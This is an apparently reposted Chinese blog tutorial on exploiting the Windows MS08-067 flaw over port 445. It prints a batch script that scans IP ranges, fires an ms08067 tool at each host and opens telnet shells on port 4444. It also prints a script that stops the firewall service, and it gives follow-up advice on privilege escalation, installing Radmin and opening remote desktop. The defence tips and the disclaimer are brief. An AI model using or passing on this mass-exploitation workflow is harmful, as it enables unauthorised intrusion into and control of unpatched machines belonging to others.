445端口MS08-067溢出拿cmdshell

(仅用来测试,现在也无法使用

转载出自:http://www.cnhonkerarmy.com/thread-167512-1-1.html)

漏洞详解:

      
       445端口通常在溢出称呼目标主机的监听端口为4444,其对应的PID为2030(随机值)。毫无疑问她应该和某个系统服务相对应,输入tasklist /svc 后发现其对于的进程是svchost.exe。该进程在系统中有多个服务,但PID为2032的这个svchost.exe进程是一个宿主进程,其中包含了诸如:  lanmanserver,lanmanworkstaione,Netman,EventSystem,SharedAccess等多个系统服务。
  
        那到底是哪个系统服务触发了该漏洞呢?经测试,当Computer Browser、Server、Workstation这三个系统服务中的任意一个服务被关闭后,用MS08-067.exe进行溢出测试均失败!
   所以可见是这三个系统服务造成了MS08-067漏洞,这和微软的漏洞说“Server”服务在处理RPC请求过程中存在一个严重的漏洞“不谋而合。那么这三个服务都是干什么的呢?相互之间有什么关系呢?Server是Windows系统的一个重要服务,其主要作用是“”支持计算机通过网络的文件、打印机、和重命名“。而Computer Browser 服务的作用是“维护网络计算机的更新列别,并将列表提供该计算机指定浏览”与Server是依存关系。另外,Workstation服务的作用是“穿件和维护到远程服务的客户端网络连接”,与Computer Browser是依存关系。上面分析为我们预防MS08-067漏洞提供了一条思路。

  工具:MS08-067溢出工具包

1.先来看看我们的工具包主要是什么工具吧。




其中attack.bat的批处理代码如下:

@echo off
color a
title MS08067 -auto attack
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s syn %%i %%j 445 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ips.txt
del s1.txt
del s2.txt
del Result.txt
for /f %%i in (ip.txt) do (
ms08067 %%i 
echo 溢出并尝试登陆%%i正在登陆Telnet.....
start c.exe /k telnet %%i 4444
)
pause

Services.bat的批处理代码如下:

@echo off
color b
title 入寝前需要开启的服务
echo.
sc config browser start= auto
sc config lanmanworkstation start= auto
sc config lanmanserver start =auto
sc config sharedaccess start =demand
sc start browser
sc start lanmanworkstation
sc start lanmanserver
sc stop sharedaccess
echo 开启服务完毕
pause

2. 先执行Services.bat开启相关服务,然后在ip.txt填写需要扫描IP段后,点击acctack.bat开始执行扫描。


 

3.扫描结束后开始执行自动溢出程序,此时将弹出N个CMD程序,如果溢出的程序过多可以在扫描的窗口按Ctrl+C键执行暂停。溢出的N个程序中,有连接失败的,也有溢出成功的,溢出成功的直接拿到路径为C:\windows\system32的CMDshell。





4.获得cmdshell 之后,我想大家如何去提权,我就不多说了~可以执行下载radmin服务端或者开启终端,对于445的PC主机可以执行双击3389的操作!谨记,在溢出成功后必须对cmdshell执行任意一条命令,防止由于长时间未执行导致断开连接。






防范445端口溢出漏洞方法:


   1.安装ms08067补丁程序。
   2.创建IP安全策略屏蔽445端口。



注:文章仅供技术参考,切勿用于非法用途,否则后果自负!
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值